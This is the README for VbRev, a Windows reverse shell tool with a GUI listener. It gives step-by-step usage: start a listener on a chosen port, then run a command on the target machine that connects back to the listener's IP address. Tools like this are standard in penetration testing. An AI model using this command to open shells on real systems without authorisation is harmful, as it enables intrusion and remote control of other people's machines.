################################
#                              #
#   VbRev Reverse Shell GUI    #
#   http://vbscrub.com         #
#                              #
################################


Basic usage:

1. On your own machine launch the GUI (VbRevUi.exe)

2. Within the GUI, specify a port number to listen on (e.g 4444) and start the listener

3. On the target machine, run the following:

   VbRev.exe 192.168.0.1 4444

   (where 192.168.0.1 is the IP address of the machine running the VbRevUi.exe GUI, and 4444 is the port number you selected in step 2).


If you do not receive a connection in the GUI, ensure there is no firewall on your side of things blocking the chosen port.


Note: Both the client and server executables need the DLL to be in the same directory they are being run from


Please report any bugs here: https://github.com/VbScrub/VbRev/issues